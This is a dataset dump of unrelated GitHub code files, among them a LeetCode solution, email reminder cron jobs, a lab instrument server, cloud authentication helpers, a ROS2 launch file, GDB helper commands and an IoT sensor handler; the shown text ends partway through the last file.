+{"seq_id":"36744233514","text":"#!/usr/bin/python3\n# -*- coding: UTF-8 -*-\n\nfrom typing import List\nimport math\n\n\nclass Solution:\n def recursive(self, begin: int, end: int, result: int) -> int:\n if end - begin <= 1:\n return begin\n mid = math.floor((begin + end) / 2)\n if mid*mid == result:\n return mid\n elif mid*mid < result:\n return self.recursive(mid, end, result)\n else:\n return self.recursive(begin, mid, result)\n\n def mySqrt(self, x: int) -> int:\n if x < 0:\n return -1\n if x == 0:\n return 0\n if x <= 3:\n return 1\n if x == 4 or x == 5:\n return 2\n end = math.floor(x / 2)\n return self.recursive(1, end, x)\n\n\ndef main():\n s = Solution()\n s.mySqrt(5)\n return\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"HUSTWillHe/MyLeetCode","sub_path":"solutions/69_my_sqrt.py","file_name":"69_my_sqrt.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13404270884","text":"import datetime\n\nfrom apps.order.models import SalesOrder\n\n\ndef notify_pending_transaction():\n from ..models import SalesOrder\n from lib.sent_email import EmailHandler\n message_version = []\n\n for order in SalesOrder.objects.filter(invoice_status__in=['new', 'credit', 'payment_partial']):\n if order.transaction_set.all().exists():\n invoice_remaining_amount = order.invoice_remaining_amount\n invoice_pending_days = 
(datetime.datetime.today().date() - order.invoice_date.date()).days\n if invoice_pending_days >= 9 and invoice_remaining_amount != 0:\n message = f\"User {order.dealer.first_name} has a pending amount of {invoice_remaining_amount} under the order {order.invoice_id} for {invoice_pending_days} days\"\n # build a fresh message version for each order so earlier entries are not overwritten\n email_content = {}\n email_content['to'] = [{\"email\": order.dealer.email, \"name\": order.dealer.first_name},]\n email_content['htmlContent'] = f\"<html><body><h1>Pending orders!</h1><p>{message}</p></body></html>\"\n email_content['subject'] = \"You have pending payments!\"\n\n if email_content not in message_version:\n message_version.append(email_content)\n # orders_list.append(order.invoice_id or order.id_as_text)\n subject = \"You have pending payments!\"\n message = \"\"\n print(message, subject, message_version)\n\n print(\"\\n\")\n\n EmailHandler().email_for_bulk(message, subject, message_version)\n # EmailHandler().sent_email_now(message, subject, message_version)\n\n\ndef notify_pending_order():\n from apps.order.models import SalesOrder\n from lib.sent_email import EmailHandler\n from apps.user.models import User\n\n sent_mail = False\n message_version = []\n message = \"You have pending orders!\"\n orders = {}\n # for user in User.objects.filter(user_role=32):\n orders_list = []\n recipient = []\n for order in SalesOrder.objects.filter(is_invoice=True):\n orders.setdefault(order.dealer.email, [])\n if (datetime.datetime.today().date() - order.invoice_date.date()).days > 2 and order.invoice_remaining_amount != 0:\n orders[order.dealer.email].append(order.invoice_id)\n message = f\"Dear {order.dealer.first_name}, your orders {','.join(orders[order.dealer.email])} have been pending for more than 2 days\"\n # recipient.append(user.email)\n # email_content[user.email] = message\n email_content = {}\n email_content['to'] = [{\"email\": order.dealer.email, \"name\": order.dealer.first_name},]\n email_content['htmlContent'] = f\"<html><body><h1>Pending orders!</h1><p>{message}</p></body></html>\"\n email_content['subject'] = \"You have pending orders!\"\n if email_content not in message_version:\n message_version.append(email_content)\n # print(\"message_version\", message_version)\n\n '''\n email_content = {\n \"name\":\"message\"\n }\n '''\n\n message = ''\n subject = {}\n subject['subject'] = \"You have pending orders\"\n subject[\"subheadline\"] = \"You have pending orders for more than 2 days\"\n # receivers = [i['to']['email'] for i in message_version]\n # import pdb;pdb.set_trace()\n print(f\"message:{message}, subject:{subject}, message_version:{message_version}\")\n EmailHandler().email_for_bulk(message, subject, message_version)\n # EmailHandler().sent_email_now(message, subject, message_version)\n\n \"\"\"\n message_version = [\n # Definition for Message Version 1\n {\n \"to\": [\n {\n \"email\": \"bob@example.com\",\n \"name\": \"Bob Anderson\"\n },\n ],\n \"htmlContent\": \"<html><body><h1>Modified header!</h1><p>This is still a paragraph</p></body></html>
    \",\n \"subject\": \"We are happy to be working with you\"\n },\n ]\n \"\"\"\n print(\"\\n\")\n","repo_name":"abhishekfegno/maxpolo_b2b","sub_path":"apps/order/cron/cron_tab.py","file_name":"cron_tab.py","file_ext":"py","file_size_in_byte":4089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22112909256","text":"# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\n\"\"\"\n### BEGIN NODE INFO\n[info]\nname = RohdeSchwarz Server\nversion = 1.2\ndescription = \n\n[startup]\ncmdline = %PYTHON% %FILE%\ntimeout = 20\n\n[shutdown]\nmessage = 987654321\ntimeout = 5\n### END NODE INFO\n\"\"\"\n\nfrom labrad.server import setting\nfrom labrad.gpib import GPIBManagedServer, GPIBDeviceWrapper\nfrom twisted.internet.defer import inlineCallbacks, returnValue\n\nclass RSSMB100AWrapper(GPIBDeviceWrapper):\n @inlineCallbacks\n def initialize(self):\n self.frequency = yield self.getFrequency()\n self.amplitude = yield self.getAmplitude()\n self.output = yield self.getOutput()\n self.phase = None\n\n @inlineCallbacks\n def getFrequency(self):\n frequency = yield self.query('SOURce:FREQuency?').addCallback(float)\n self.frequency = frequency / 10.**6 #now in MHz\n returnValue(self.frequency)\n\n @inlineCallbacks\n def getAmplitude(self):\n self.amplitude = yield self.query('POWer?').addCallback(float)\n returnValue(self.amplitude)\n \n @inlineCallbacks\n def getOutput(self):\n state = yield self.query('OUTput:STATe?').addCallback(float)\n self.state = bool(state)\n returnValue(self.state)\n \n @inlineCallbacks\n def setFrequency(self, f):\n if self.frequency != f:\n yield self.write('SOURce:FREQuency {}MHZ'.format(float(f)))\n self.frequency = f\n \n @inlineCallbacks\n def setAmplitude(self, a):\n if self.amplitude != a:\n yield self.write('POWer {}'.format(float(a)))\n self.amplitude = a\n\n @inlineCallbacks\n def setOutput(self, out):\n if self.output != out:\n yield self.write('OUTput:STATe {}'.format(int(out)))\n self.output = out\n \n @inlineCallbacks\n def make_new_list(self, inputs, name):\n freqs,powers = zip(*inputs)\n freqString = \"SOURce1:LIST:FREQ\" + \"\".join([\" {} MHZ,\".format(freq) for freq in freqs])\n powerString = \"SOURce1:LIST:POW\" + \"\".join([\" {}dBm,\".format(pwr) for pwr in powers])\n #deleting the last comma\n freqString = freqString[:-1]\n powerString = powerString[:-1]\n yield self.write('SOURce1:LIST:SEL \"{}\"'.format(name))\n yield self.write(freqString)\n yield self.write(powerString)\n \n @inlineCallbacks\n def activate_list_mode(self, state):\n if state:\n yield self.write(\"SOURce1:LIST:MODE STEP\") #sets the step mode\n yield self.write(\"SOURce1:LIST:TRIGger:SOURce EXT\") #external triggering\n yield self.write(\"SOURce1:FREQuency:MODE LIST\") #activates step mode (output must be on)\n else:\n yield self.write(\"SOURce1:FREQuency:MODE CW\")\n \n @inlineCallbacks\n def reset_list(self):\n yield self.write(\"SOURce1:LIST:RES\")\n \n @inlineCallbacks\n 
def set_phase(self, phase):\n phase = round(phase, 1)\n if not -359.9<=phase<=359.9: raise Exception (\"Phase out of range\")\n yield self.write('SOURce:PHASe {}DEG'.format(phase))\n self.phase = phase\n \nclass RohdeSchwarzServer(GPIBManagedServer):\n \"\"\"Provides basic CW control for Rohde&Schwarz SMB100A RF Generators\"\"\"\n name = 'RohdeSchwarz Server'\n deviceName = 'Rohde&Schwarz SMB100A'\n deviceWrapper = RSSMB100AWrapper\n\n @setting(10, 'Frequency', f=['v[MHz]'], returns=['v[MHz]'])\n def frequency(self, c, f=None):\n \"\"\"Get or set the CW frequency.\"\"\"\n dev = self.selectedDevice(c)\n if f is not None:\n yield dev.setFrequency(f)\n returnValue(dev.frequency)\n\n @setting(11, 'Amplitude', a=['v[dBm]'], returns=['v[dBm]'])\n def amplitude(self, c, a=None):\n \"\"\"Get or set the CW amplitude.\"\"\"\n dev = self.selectedDevice(c)\n if a is not None:\n yield dev.setAmplitude(a)\n returnValue(dev.amplitude)\n\n @setting(12, 'Output', os=['b'], returns=['b'])\n def output_state(self, c, os=None):\n \"\"\"Get or set the output status.\"\"\"\n dev = self.selectedDevice(c)\n if os is not None:\n yield dev.setOutput(os)\n returnValue(dev.output)\n \n @setting(13,'Activate List Mode', state = 'b', returns = '')\n def activate_list(self, c, state):\n \"\"\"Activate the List Mode\"\"\"\n dev = self.selectedDevice(c)\n yield dev.activate_list_mode(state)\n# if bool(state):\n# #make sure the list goes to the first index after programming\n# print 'resetting'\n# yield dev.reset_list()\n \n @setting(14,\"Reset List\", returns = '')\n def reset_list(self, c):\n \"\"\"Reset the List for List Mode\"\"\"\n dev = self.selectedDevice(c)\n yield dev.reset_list()\n \n @setting(15,\"New List\", inputs = '*(vv)', name = 's', returns = '')\n def make_new_list(self, c, inputs, name = 'unnamed'):\n \"\"\"Make a new list, input is a list of tuples in the form (freq in Mhz, power in dBm)\"\"\"\n dev = self.selectedDevice(c)\n yield dev.make_new_list(inputs.astuple, name)\n \n \n @setting(16,\"Set Phase\", phase = 'v', returns = '')\n def set_phase(self, c, phase):\n \"\"\"Sets the phase of the output, useful for phase locked applications\"\"\"\n dev = self.selectDevice(c)\n yield dev.set_phase(phase)\n\n__server__ = RohdeSchwarzServer()\n\nif __name__ == '__main__':\n from labrad import util\n util.runServer(__server__)\n","repo_name":"HaeffnerLab/Haeffner-Lab-LabRAD-Tools","sub_path":"gpibservers/rs_smb100a.py","file_name":"rs_smb100a.py","file_ext":"py","file_size_in_byte":6043,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"4754167097","text":"import argparse\nimport pathlib\nimport sys\nimport yaml\nimport logging\n\nimport pandas as pd\nfrom grist_api import GristDocAPI\n\nfrom cyoa_archives.grist.api import GristAPIWrapper\n\nlogger = logging.getLogger(__name__)\n\n# Parse args\nparser = argparse.ArgumentParser(\n description=\"Parse a subreddit for submissions using praw.\"\n)\nparser.add_argument(\"-c\", \"--config_file\", help=\"Configuration file to use\")\nargs = parser.parse_args()\nif args.config_file:\n filepath = pathlib.Path(args.config_file)\n try:\n with open(filepath) as f:\n config = yaml.safe_load(f)\n except OSError:\n print(f\"Could not read file: {filepath}\")\n sys.exit(1)\n\n\n# Set up API\napi = GristAPIWrapper.from_config(config.get('grist'))\n\nbackup_api = GristAPIWrapper.from_config(config.get('grist'))\nbackup_api.document_id = 'CENSORED'\nbackup_api.api = GristDocAPI(backup_api.document_id, 
server=backup_api.server_url, api_key=backup_api.api_key)\n\ngrist_pd = backup_api.fetch_table_pd('CYOAs', col_names=['id', 'pov', 'content_tags'])\n# print(grist_pd)\n\nresult_list = []\nfor index, row in grist_pd.iterrows():\n g_id = row['id']\n pov = row['pov']\n tags = row['content_tags']\n\n result_list.append({\n 'id': g_id,\n 'pov': pov,\n 'content_tags': tags\n })\n# print(result_list)\n\n# Update grist\napi.update_records('CYOAs', result_list, mock=False, prompt=True)\n","repo_name":"anonekama/cyoa-archives","sub_path":"code_snippets/fix_pov_contenttags.py","file_name":"fix_pov_contenttags.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30846177085","text":"#!/usr/bin/env /Library/Frameworks/Python.framework/Versions/3.11/bin/python3\n\nimport openai\nimport pyperclip\nimport os\n\n# Retrieve OpenAI API key from environment variable\nopenai.api_key = os.environ.get('KMVAR_OPENAI_API_KEY')\n\n# Get text from clipboard\nhighlightedText = pyperclip.paste()\n\n# Prompt Specifics\nsystemMessage = \"You are an excellent summarizer.\"\npromptTemplate = f\"Summarize the following: {highlightedText}\"\n\nresponse = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": systemMessage},\n {\"role\": \"user\", \"content\": promptTemplate}\n ]\n)\n\n# Print the generated text to standard output\nprint(response.choices[0].message.content.strip())\n","repo_name":"OldmanRahul/Twitter-Shares","sub_path":"KM-OpenAi-Summarize.py","file_name":"KM-OpenAi-Summarize.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1439352728","text":"import json\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Hash import SHA256\nfrom Crypto.Hash import RIPEMD160\nimport binascii\nimport hashlib\n\nclass Hash:\n\n @staticmethod\n def hash(block):\n \"\"\"\n Creates a SHA-256 hash of a Block\n :param block: Block\n \"\"\"\n\n # We must make sure that the Dictionary is Ordered, or we'll have inconsistent hashes\n block_string = json.dumps(block, sort_keys=True).encode()\n return hashlib.sha256(block_string).hexdigest()\n\n @staticmethod\n def calculate_hash(data, hash_function):\n \"\"\"\n function for creating hashes of keys for wallet generation\n returns a SHA256 or RIPEMD160 hash depending\n on the hash function selected in the function call.\n \"\"\"\n data = bytearray(data, \"utf-8\")\n if hash_function == \"sha256\":\n h = SHA256.new()\n h.update(data)\n return h.hexdigest()\n if hash_function == \"ripemd160\":\n h = RIPEMD160.new()\n h.update(data)\n return h.hexdigest()\n\nclass Write:\n\n @staticmethod\n def write_json_wallet(data, mode, filename='data/wallet.json'):\n \"\"\"\n write a generated wallet to wallet.json\n \"\"\"\n # opens the file in write mode\n with open(filename, mode) as file:\n block_dict = json.dumps(data, indent=6)\n file.write(block_dict)\n\n @staticmethod\n def write_chain(data, filename='data/chain.json'):\n \"\"\"\n appends block to chain.json\n \"\"\"\n # opens the file in append mode\n with open(filename, 'a') as file:\n block_dict = json.dumps(data)\n file.write(block_dict)\n file.write('\\n')\n\nclass Generate:\n @staticmethod\n def generate_wallet():\n \"\"\"\n function for the generation of wallets\n \"\"\"\n private_key = RSA.generate(4096)\n private_key_plain = private_key.export_key(\"PEM\")\n public_key_plain = 
private_key.publickey().export_key(\"PEM\")\n public_key = private_key.publickey().export_key(\"DER\")\n public_key_hex = binascii.hexlify(public_key).decode(\"utf-8\")\n public_key_hash = Hash.calculate_hash(Hash.calculate_hash(public_key_hex, hash_function=\"sha256\"),\n hash_function=\"ripemd160\")\n\n wallet_data = {\n 'private key': private_key_plain.decode(),\n 'public key': public_key_plain.decode(),\n 'public key hex': public_key_hex,\n 'public key hash': public_key_hash\n }\n Write.write_json_wallet(data=wallet_data, mode='w')\n\n\nHash()\n","repo_name":"ock666/Serpentcoin","sub_path":"src/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2656,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"38983720229","text":"import cv2\nimport numpy as np\n\ncam = cv2.VideoCapture(\"http://192.168.43.1:7777/video?x.mjpg\") #use your own IP address or\n#for webcam use 0 or other external camera use 1\nwidth = int(cam.get(cv2.CAP_PROP_FRAME_WIDTH))\nheight = int(cam.get(cv2.CAP_PROP_FRAME_HEIGHT))\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\nvid = cv2.VideoWriter('output.avi', fourcc, 10, (width,height))\nprint(width)\nprint(height)\n\nwhile(True):\n tf, frame = cam.read()\n vid.write(frame)\n cv2.imshow('Single Frame',frame)\n key = cv2.waitKey(1)\n if key == 27: #esc key\n break\n elif key == ord('x'):\n print(\"You have pressed the letter X\")\n\ncam.release()\nvid.release()\ncv2.destroyAllWindows()\n","repo_name":"Omprakash76/Capture_video_From_CCTV","sub_path":"capture.py","file_name":"capture.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"7050385911","text":"\n#OBJECTIVE:\n# Create a script that takes a command line input, converts that command line inpute to snake case, then makes that\n# command line input the filename and title of a new file in my feynman_technique folder in my vault. The script will\n# then append 3 lines of space, followed by the text \"press R to insert explanation here,\" followed by 3 more lines of\n# space. This will then do the same thing with a simplified explanation.\n\n#Modules\nimport os\n\n# Take command line input of concept to be learned\n\ndef concept_input():\n\tconcept = str(input(\"What concept would you like to learn? 
\"))\n\treturn (concept)\n\n# print(concept_input())\n\n\n# Convert to snake case\n\ndef sneky_case(string):\n string = list(string);\n n = len(string);\n \n for i in range(n) :\n if (string[i] == \" \") :\n string[i] = \"_\" ;\n\n else:\n string[i] = string[i].lower();\n\n string = \"\".join(string)\n return string\n\nprint(sneky_case(\"Poopy Goopy Doopy\"))\n# print(sneky_case(concept_input))\n\n\n# Make snake case phrase into file name, as well as append date\n\n\n# Append original name, date in Month/dd/yyyy format, 3 blank lines, \"Complex Description\", , 3 blank lines, \"Simplified Description\", \n\n\n\n# Vim filename starting at appropriate line, most likely under Complex Description.\n\n","repo_name":"cmaxreilly/shell_scripts","sub_path":"feyn.py","file_name":"feyn.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7885017651","text":"import oci\nimport os\n\n##########################################################################\n# Create signer for Authentication\n# Input - config_profile and is_instance_principals and is_delegation_token\n# Output - config and signer objects\n##########################################################################\ndef create_signer(config_profile, is_instance_principals, is_delegation_token):\n\n # if instance principals authentications\n if is_instance_principals:\n try:\n signer = oci.auth.signers.InstancePrincipalsSecurityTokenSigner()\n config = {'region': signer.region, 'tenancy': signer.tenancy_id}\n return config, signer\n\n except Exception:\n print_header(\"Error obtaining instance principals certificate, aborting\")\n raise SystemExit\n\n # -----------------------------\n # Delegation Token\n # -----------------------------\n elif is_delegation_token:\n\n try:\n # check if env variables OCI_CONFIG_FILE, OCI_CONFIG_PROFILE exist and use them\n env_config_file = os.environ.get('OCI_CONFIG_FILE')\n env_config_section = os.environ.get('OCI_CONFIG_PROFILE')\n\n # check if file exist\n if env_config_file is None or env_config_section is None:\n MakeLog(\"*** OCI_CONFIG_FILE and OCI_CONFIG_PROFILE env variables not found, abort. 
***\")\n MakeLog(\"\")\n raise SystemExit\n\n config = oci.config.from_file(env_config_file, env_config_section)\n delegation_token_location = config[\"delegation_token_file\"]\n\n with open(delegation_token_location, 'r') as delegation_token_file:\n delegation_token = delegation_token_file.read().strip()\n # get signer from delegation token\n signer = oci.auth.signers.InstancePrincipalsDelegationTokenSigner(delegation_token=delegation_token)\n\n return config, signer\n\n except KeyError:\n MakeLog(\"* Key Error obtaining delegation_token_file\")\n raise SystemExit\n\n except Exception:\n raise\n\n # -----------------------------\n # config file authentication\n # -----------------------------\n else:\n config = oci.config.from_file(\n oci.config.DEFAULT_LOCATION,\n (config_profile if config_profile else oci.config.DEFAULT_PROFILE)\n )\n signer = oci.signer.Signer(\n tenancy=config[\"tenancy\"],\n user=config[\"user\"],\n fingerprint=config[\"fingerprint\"],\n private_key_file_location=config.get(\"key_file\"),\n pass_phrase=oci.config.get_config_value_or_default(config, \"pass_phrase\"),\n private_key_content=config.get(\"key_content\")\n )\n return config, signer\n","repo_name":"AnykeyNL/OCI-AutoScale","sub_path":"OCIFunctions.py","file_name":"OCIFunctions.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"37"} +{"seq_id":"13575976372","text":"from potential import *\nimport os\nimport time\nimport subprocess\n\ndef RecordSpec(N):\n Theta = np.linspace(-1, 1, N) #cos(theta)\n os.chdir(r'C:\\Users\\USER\\Desktop\\Xe-O2 Level')\n spec=open(r\"C:\\Users\\USER\\Desktop\\Xe-O2 Level\\Spectrum(theta)1.txt\",'w')\n for theta in Theta:\n print(theta)\n PES(10**4, r=-1, th = theta )\n file = open(r\"C:\\Users\\USER\\Desktop\\Xe-O2 Level\\Level.input.txt\",'r')\n f=file.readlines() # lines 9 through 10008 (inclusive) need to be replaced for N=10**4\n file.close()\n surf = open(r\"C:\\Users\\USER\\Desktop\\Xe-O2 Level\\Potential.txt\",'r')\n s = surf.readlines()\n surf.close()\n f[9:10009] = s[::]\n file = open(r\"C:\\Users\\USER\\Desktop\\Xe-O2 Level\\Level.input.txt\",'w')\n file.writelines(f)\n file.close()\n # os.startfile(r'C:\\Users\\USER\\Desktop\\Xe-O2 Level\\Level.bat')\n os.system(r'start Level.bat')\n time.sleep(3)\n file=open(r\"C:\\Users\\USER\\Desktop\\Xe-O2 Level\\fort.7\",'r')\n f=file.readlines() # the spectrum runs from the 3rd position to the end\n file.close()\n for i in f[3:]:\n spec.writelines(i.strip().split()[2]+' ')\n spec.write('\\n')\n\n spec.close()\n","repo_name":"ethylking/partition_function_Xe-O2","sub_path":"RecordSpectra.py","file_name":"RecordSpectra.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3937493764","text":"import random\n\na = 1\nb = 2**10\n\nwhile True:\n # num = random.randint(a, b)\n num = int((a+b)/2)\n ans = input(f\"is it {num}? 
(+, -, y)\")\n\n if ans == '-':\n b = num\n elif ans == '+':\n a = num\n else:\n print(f\"it's {num}\")\n break\n","repo_name":"pymft/mft-01","sub_path":"S05/intro_to_stdlib/computer_guess_the_number.py","file_name":"computer_guess_the_number.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"8652410095","text":"#!/usr/bin/python3\n\n\"\"\"\nPrint the state object id\n\"\"\"\n\nimport sys\nfrom model_state import Base, State\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import Session\n\nif __name__ == \"__main__\":\n engine = create_engine(\n \"mysql+mysqldb://{}:{}@localhost/{}\".format(\n sys.argv[1], sys.argv[2], sys.argv[3]\n ),\n pool_pre_ping=True,\n )\n Base.metadata.create_all(engine)\n\n session = Session(engine)\n found = False\n for state in (\n session.query(State).filter(State.name == sys.argv[4]).\n order_by(State.id)\n ):\n if state:\n print(f\"{state.id}\")\n found = True\n break\n if not found:\n print(\"Not found\")\n session.close()\n","repo_name":"Camaltra/holbertonschool-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/10-model_state_my_get.py","file_name":"10-model_state_my_get.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22707923645","text":"import os\n\nfrom ament_index_python.packages import get_package_share_directory\n\n\nfrom launch import LaunchDescription\nfrom launch.actions import IncludeLaunchDescription, TimerAction\nfrom launch.launch_description_sources import PythonLaunchDescriptionSource\n\nfrom launch_ros.actions import Node\nfrom launch.substitutions import Command\nfrom launch_ros.descriptions import ParameterValue\n\nfrom launch.actions import RegisterEventHandler\nfrom launch.event_handlers import OnProcessStart\n\ndef generate_launch_description():\n package_name='oscar_ros'\n\n rsp = IncludeLaunchDescription(\n PythonLaunchDescriptionSource([os.path.join(\n get_package_share_directory(package_name),'launch','rsp.launch.py'\n )]), launch_arguments={'use_sim_time': 'True', 'use_ros2_control': 'True'}.items()\n )\n\n robot_description = Command(['ros2 param get --hide-type /robot_state_publisher robot_description'])\n\n controller_params_file = os.path.join(get_package_share_directory(package_name),'config','my_controllers.yaml')\n\n controller_manager = Node(\n package=\"controller_manager\",\n executable=\"ros2_control_node\",\n parameters=[{'robot_description': ParameterValue(robot_description, value_type=str)},\n controller_params_file, {'use_sim_time': True}]\n )\n\n delayed_controller_manager = TimerAction(period=0.5, actions=[controller_manager])\n\n diff_drive_spawner = Node(\n package=\"controller_manager\",\n executable=\"spawner\",\n arguments=[\"diff_cont\"],\n )\n\n delayed_diff_drive_spawner = RegisterEventHandler(\n event_handler=OnProcessStart(\n target_action=controller_manager,\n on_start=[diff_drive_spawner],\n )\n )\n\n joint_broad_spawner = Node(\n package=\"controller_manager\",\n executable=\"spawner\",\n arguments=[\"joint_broad\"],\n )\n\n delayed_joint_broad_spawner = RegisterEventHandler(\n event_handler=OnProcessStart(\n target_action=controller_manager,\n on_start=[joint_broad_spawner],\n )\n )\n robot_localization_node = Node(\n package='robot_localization',\n executable='ekf_node',\n name='ekf_filter_node',\n output='screen',\n 
parameters=[os.path.join(get_package_share_directory(package_name), 'config/ekf.yaml'), {'use_sim_time': True}]\n )\n\n delayed_robot_localization_spawner = RegisterEventHandler(\n event_handler=OnProcessStart(\n target_action=diff_drive_spawner,\n on_start=[robot_localization_node],\n )\n )\n\n\n # Launch them all!\n return LaunchDescription([\n rsp,\n delayed_controller_manager,\n delayed_diff_drive_spawner,\n delayed_joint_broad_spawner,\n delayed_robot_localization_spawner\n ])\n","repo_name":"brow1633/oscar_ros","sub_path":"launch/launch_sim.launch.py","file_name":"launch_sim.launch.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"32719436685","text":"import gdb\n\n\nclass QuitCommand(gdb.Command):\n\n _quit_tpl = 'quit {code}'.format\n _error = '128+$_siginfo.si_signo'\n _code = '$_exitcode'\n\n def __init__(self):\n super().__init__('quit_command', gdb.COMMAND_NONE)\n\n def invoke(self, _, from_tty):\n sig_info = gdb.parse_and_eval('$_siginfo')\n code = self._code if sig_info.type.name == 'void' else self._error\n gdb.execute(self._quit_tpl(code=code), from_tty=from_tty)\n\n\nclass InitCommand(gdb.Command):\n\n _init_commands = (\n 'handle SIG38 nostop noprint pass',\n 'set breakpoint pending on',\n 'set confirm off',\n 'set prompt',\n 'maint set internal-error quit yes',\n 'maint set internal-error corefile no',\n 'set backtrace limit 25',\n 'set print elements 10',\n 'set python print-stack full',\n 'set trace-commands on',\n 'set overload-resolution off',\n )\n\n def __init__(self):\n super().__init__('init_command', gdb.COMMAND_NONE)\n\n def invoke(self, _, from_tty):\n for command in self._init_commands:\n gdb.execute(command, from_tty=from_tty)\n\n\nInitCommand()\nQuitCommand()\n\n\n# '-ex', 'print $_siginfo',\n# '-ex', 'info locals',\n# '-ex', 'info registers',\n# '-ex', 'backtrace full',\n# '-ex', 'disassemble',\n# '-ex', 'symbol-file',\n# '-ex', 'sharedlibrary',\n# '-ex', 'info proc mappings',\n# '-ex', 'info threads',\n# '-ex', 'shared',\n# '-ex', 'info sharedlibrary',\n# gdb.execute('info sharedlibrary', from_tty=from_tty, to_string=True)\n# gdb.execute('info registers', from_tty=from_tty, to_string=True)\n","repo_name":"PrVrSs/eibon","sub_path":"eibon/gdb_commands.py","file_name":"gdb_commands.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"38910294055","text":"import json\nimport topics\nimport datetime\nimport pytz\nimport time\n\n\nclass Handler:\n def __init__(self):\n pass\n\n def set_mqtt_client(self, mqtt):\n self.mqtt_client = mqtt.client\n\n def set_basil_database(self, mongodbclient):\n self.basil_db = mongodbclient.basil_db\n self.moisture_sensor_reading = self.basil_db.moisture_sensor_reading\n self.pump_water_status = self.basil_db.pump_water_status\n\n def moisture_analog_topic(self, topic, msg):\n # FIXME: For some reasons json.loads converting string to string, not dict\n # As a workaround I am being forced to call it twice\n # Find what's the bug, and fix it.\n json_msg = json.loads(json.loads(msg))\n # In embedded systems, epoch time is from year 2000, that's why +946684800\n json_msg[\"timestamp\"] = json_msg[\"timestamp\"]+946684800\n try:\n id = self.moisture_sensor_reading.insert_one(json_msg).inserted_id\n print(\"New Moisture sensor reading added\", id)\n except Exception as e:\n print(\"Error while inserting moisture sensor reading\", 
e)\n raise(e)\n\n def pump_water_topic(self, topic, msg):\n # FIXME: For some reasons json.loads converting string to string, not dict\n # As a workaround I am being forced to call it twice\n # Find what's the bug, and fix it.\n json_msg = json.loads(json.loads(msg))\n # In embedded systems, epoch time is from year 2000, that's why +946684800\n json_msg[\"timestamp\"] = json_msg[\"timestamp\"]+946684800\n try:\n id = self.pump_water_status.insert_one(json_msg).inserted_id\n print(\"New pump water status added\", id)\n except Exception as e:\n print(\"Error while inserting pump water status\", e)\n raise(e)\n\n def set_moisture_reading_frequency(self, frequency=30):\n json_msg = {\n \"frequency\": frequency\n }\n try:\n print(\"Publishing set moisture read frequency command\")\n self.mqtt_client.publish(\n topics.BASIL_MOISTURE_FREQ_COMMAND_TOPIC, json.dumps(json_msg))\n except Exception as e:\n print(\"Error while publishing set moisture read frequency with msg\", json_msg)\n\n def start_pump(self, duration=0):\n json_msg = {\n \"command\": \"ON\",\n \"duration\": duration\n }\n try:\n print(\"Publishing start pump command\")\n self.mqtt_client.publish(\n topics.PUMP_ONOFF_COMMAND_TOPIC, json.dumps(json_msg))\n except Exception as e:\n print(\"Error while publishing start pump comamnd with msg\", json_msg)\n\n def stop_pump(self):\n json_msg = {\n \"command\": \"OFF\",\n }\n try:\n print(\"Publishing stop pump command\")\n self.mqtt_client.publish(\n topics.PUMP_ONOFF_COMMAND_TOPIC, json.dumps(json_msg))\n except Exception as e:\n print(\"Error while publishing stop pump comamnd with msg\", json_msg)\n\n def get_moisture_reading_data(self, from_time, interval=\"hourly\"):\n common_pipeline = [\n {\n \"$match\": {\n \"timestamp\": {\"$gt\": from_time},\n }\n },\n {\n \"$project\": {\n \"timestamp\": {\n \"$toDate\": {\n \"$multiply\": [\n '$timestamp', 1000]\n }\n },\n \"analog_value\":1,\n \"moisture_level\":1\n }\n },\n ]\n pipeline = {\n \"minutely\": [\n *common_pipeline,\n {\n \"$project\": {\n \"timestamp\": 1, \"timestampMinute\": {\n \"$minute\": \"$timestamp\"\n },\n \"timestampHour\": {\n \"$hour\": \"$timestamp\"\n }, \"analog_value\": 1, \"moisture_level\": 1\n }\n },\n {\n \"$group\": {\n \"_id\": {\n \"minute\": 